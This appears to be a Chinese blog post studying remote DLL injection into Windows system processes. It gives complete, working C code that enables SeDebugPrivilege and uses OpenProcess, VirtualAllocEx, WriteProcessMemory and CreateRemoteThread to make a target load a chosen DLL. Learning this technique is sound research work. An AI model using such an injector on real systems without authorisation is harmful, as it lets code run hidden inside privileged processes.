
远程注入(系统进程)


最近在看 Windows 黑客编程的 pdf，又看了一下突破 Session 0 隔离的内容。网上"直接把 dll 注入到系统进程"的代码试了一下行不通，改过之后就行了。都是在 208 上测的，和另外几个相关的函数没有多大差别。原以为不是权限的问题，试了一下确实是权限的问题（需要先开启 SeDebugPrivilege，见下文）。

用到的 API 函数

远程注入:

  • OpenProcess
  • VirtualAllocEx
  • WriteProcessMemory
  • CreateRemoteThread

特权开启:

  • OpenProcessToken
  • LookupPrivilegeValueA
  • AdjustTokenPrivileges

复现过程

开启 SeDebugPrivilege 特权（前提是当前进程以管理员身份运行，令牌中本来就带有该特权；否则 AdjustTokenPrivileges 会返回成功但 GetLastError() 为 ERROR_NOT_ALL_ASSIGNED，实际上什么也没开启，后面的 OpenProcess 对系统进程会报拒绝访问）

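/*
 * Enable SeDebugPrivilege in the current process token.
 *
 * SeDebugPrivilege is what lets the later OpenProcess succeed on processes
 * owned by another account (SYSTEM services etc.). AdjustTokenPrivileges can
 * only switch on a privilege that is already *present* in the token, so the
 * injector must itself run elevated (or as an account holding the privilege).
 * Otherwise the call returns TRUE with GetLastError() == ERROR_NOT_ALL_ASSIGNED
 * and nothing is enabled; that case is reported as a failure here.
 *
 * Returns true if the privilege is now enabled, false otherwise (the Win32
 * error code is printed). The token handle is closed on every path.
 * (The misspelled name is kept so existing callers still compile.)
 */
bool EnbalePrivileges() {
        HANDLE hToken = NULL;
        LUID luidValue = { 0 };
        TOKEN_PRIVILEGES tp = { 0 };
        bool enabled = false;

        /* TOKEN_ADJUST_PRIVILEGES is the only access right AdjustTokenPrivileges needs. */
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
                printf("OpenProcessToken Error Code:%lu\n", GetLastError());
                return false;
        }

        /* Resolve the privilege name to the LUID that represents it on this machine. */
        if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &luidValue)) {
                printf("LookupPrivilegeValueA Privilege:SeDebugPrivilege Error Code:%lu\n", GetLastError());
        } else {
                tp.PrivilegeCount = 1;
                tp.Privileges[0].Luid = luidValue;
                tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)) {
                        printf("Enable Privilege Failure Error Code:%lu\n", GetLastError());
                } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
                        /* TRUE return but nothing enabled: the token does not hold
                         * SeDebugPrivilege (typically: not running elevated). */
                        printf("Enable Privilege Failure: token does not hold SeDebugPrivilege (ERROR_NOT_ALL_ASSIGNED)\n");
                } else {
                        printf("Enable Privilege:SeDebugPrivilege Sucess\n");
                        enabled = true;
                }
        }

        CloseHandle(hToken);
        return enabled;
}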

完整代码

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Prints NAME with the current Win32 error code and then executes `return 1;`
 * in the function that *uses* the macro (it is not a function call). It does
 * no cleanup, so a handle opened before the failing call is leaked, and in a
 * bool-returning function a return value of 1 reads as true/success.
 * GetLastError() returns a DWORD (unsigned long); %d is a mismatched specifier. */
#define errorprint(name){printf("%s Error Code:%d\n",name,GetLastError());return 1;}
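/*
 * Enable SeDebugPrivilege in the current process token.
 *
 * SeDebugPrivilege is what lets the later OpenProcess succeed on processes
 * owned by another account (SYSTEM services etc.). AdjustTokenPrivileges can
 * only switch on a privilege that is already *present* in the token, so the
 * injector must itself run elevated (or as an account holding the privilege).
 * Otherwise the call returns TRUE with GetLastError() == ERROR_NOT_ALL_ASSIGNED
 * and nothing is enabled; that case is reported as a failure here.
 *
 * Returns true if the privilege is now enabled, false otherwise (the Win32
 * error code is printed). The token handle is closed on every path.
 * (The misspelled name is kept so existing callers still compile.)
 */
bool EnbalePrivileges() {
        HANDLE hToken = NULL;
        LUID luidValue = { 0 };
        TOKEN_PRIVILEGES tp = { 0 };
        bool enabled = false;

        /* TOKEN_ADJUST_PRIVILEGES is the only access right AdjustTokenPrivileges needs. */
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
                printf("OpenProcessToken Error Code:%lu\n", GetLastError());
                return false;
        }

        /* Resolve the privilege name to the LUID that represents it on this machine. */
        if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &luidValue)) {
                printf("LookupPrivilegeValueA Privilege:SeDebugPrivilege Error Code:%lu\n", GetLastError());
        } else {
                tp.PrivilegeCount = 1;
                tp.Privileges[0].Luid = luidValue;
                tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)) {
                        printf("Enable Privilege Failure Error Code:%lu\n", GetLastError());
                } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
                        /* TRUE return but nothing enabled: the token does not hold
                         * SeDebugPrivilege (typically: not running elevated). */
                        printf("Enable Privilege Failure: token does not hold SeDebugPrivilege (ERROR_NOT_ALL_ASSIGNED)\n");
                } else {
                        printf("Enable Privilege:SeDebugPrivilege Sucess\n");
                        enabled = true;
                }
        }

        CloseHandle(hToken);
        return enabled;
}

/*
 * Demo injector: load a DLL into another process via a remote LoadLibraryA.
 *
 *   enable SeDebugPrivilege -> OpenProcess -> VirtualAllocEx (room for the
 *   DLL path) -> WriteProcessMemory (the path, NUL included) ->
 *   CreateRemoteThread(kernel32!LoadLibraryA, remote path) -> wait -> free.
 *
 * Usage: <exe> [pid] [dll_path]. Both default to the values of the original
 * post so the demo still runs unchanged; pass them to avoid editing the source.
 *
 * Differences from the version in the post: the path is written with
 * strlen+1 bytes (strlen*2 read past the end of the literal); a failed
 * CreateRemoteThread no longer falls through to "Sucess"; pointers are printed
 * with %p (%x truncates on x64); process/thread handles and the remote buffer
 * are released; the access mask is the minimum the three calls document.
 *
 * Caveats: the LoadLibraryA address comes from *this* process and is only
 * valid in the target if both are the same bitness (kernel32 shares one base
 * per bitness per boot); a 32/64 mismatch crashes the target. The path is
 * resolved by the target, so it must exist and be readable by that account.
 * Protected processes refuse OpenProcess even with SeDebugPrivilege.
 */
int main(int argc, char *argv[])
{
        DWORD pid = 1148;                       /* original post's target */
        const char *dllname = "C:\\Users\\JiuShi\\Desktop\\testdll.dll";
        HANDLE pidmodule = NULL;
        LPVOID vaeAddr = NULL;
        FARPROC loadaddress = NULL;
        HANDLE runthread = NULL;
        DWORD exitcode = 0;
        bool remote_busy = false;               /* true while the remote thread may still read vaeAddr */
        int rc = 1;                             /* exit status: 0 only when the DLL was loaded */

        if (argc > 1) {
                char *end = NULL;
                unsigned long v = strtoul(argv[1], &end, 10);
                if (end == argv[1] || *end != '\0' || v == 0) {
                        printf("Usage: %s [pid] [dll_path]\n", argv[0]);
                        return 1;
                }
                pid = (DWORD)v;
        }
        if (argc > 2) {
                dllname = argv[2];
        }

        if (!EnbalePrivileges()) {
                /* Not fatal: a target owned by the same user needs no SeDebugPrivilege.
                 * For SYSTEM-owned targets OpenProcess will fail below with access denied. */
                printf("Warning: SeDebugPrivilege not enabled, OpenProcess may be denied on system processes\n");
        }

        /* +1 so the terminating NUL reaches the target; LoadLibraryA reads a C string there. */
        SIZE_T dllnamesize = strlen(dllname) + 1;

        /* Least privilege: exactly the rights VirtualAllocEx, WriteProcessMemory and
         * CreateRemoteThread document needing, instead of PROCESS_ALL_ACCESS. */
        const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                             PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
        pidmodule = OpenProcess(access, FALSE, pid);
        if (pidmodule == NULL) {
                printf("OpenProcess Error Code:%lu\n", GetLastError());
                return 1;
        }
        printf("OpenProcess HANDLE %p\n", pidmodule);

        vaeAddr = VirtualAllocEx(pidmodule, NULL, dllnamesize, MEM_COMMIT, PAGE_READWRITE);
        if (vaeAddr == NULL) {
                printf("VirtualAllocEx Error Code:%lu\n", GetLastError());
                goto cleanup;
        }
        printf("VirtualAllocEx Sucess %p\n", vaeAddr);

        if (!WriteProcessMemory(pidmodule, vaeAddr, dllname, dllnamesize, NULL)) {
                printf("WriteProcessMemory Error Code:%lu\n", GetLastError());
                goto cleanup;
        }
        printf("WriteProcessMemory Sucess\n");

        loadaddress = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA");
        if (loadaddress == NULL) {
                printf("Get Kernel32 Address Error Code:%lu\n", GetLastError());
                goto cleanup;
        }
        printf("Get Function LoadlibraryA Function Address:%p\n", (void *)loadaddress);

        runthread = CreateRemoteThread(pidmodule, NULL, 0, (LPTHREAD_START_ROUTINE)loadaddress, vaeAddr, 0, NULL);
        if (runthread == NULL) {
                printf("CreateRemoteThread Error Code:%lu\n", GetLastError());
                goto cleanup;
        }
        printf("CreateRemoteThread Sucess\n");
        remote_busy = true;

        /* LoadLibraryA's HMODULE becomes the thread exit code (low 32 bits on x64);
         * 0 means the target could not load the DLL. Bounded wait so a hung DllMain
         * cannot hang the injector; on timeout the remote buffer is left in place
         * rather than freed under a thread that may still read it. */
        if (WaitForSingleObject(runthread, 10000) == WAIT_OBJECT_0) {
                remote_busy = false;
                if (GetExitCodeThread(runthread, &exitcode) && exitcode != 0) {
                        rc = 0;
                } else {
                        printf("LoadLibraryA failed in the target (exit code %lu)\n", exitcode);
                }
        } else {
                printf("Remote LoadLibraryA did not finish within 10s\n");
        }

cleanup:
        if (runthread != NULL) {
                CloseHandle(runthread);
        }
        if (vaeAddr != NULL && !remote_busy) {
                VirtualFreeEx(pidmodule, vaeAddr, 0, MEM_RELEASE);
        }
        CloseHandle(pidmodule);
        if (rc == 0) {
                system("pause");
        }
        return rc;
}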
6BMHaD.png

参考链接

https://blog.csdn.net/weixin_41890599/article/details/108771480
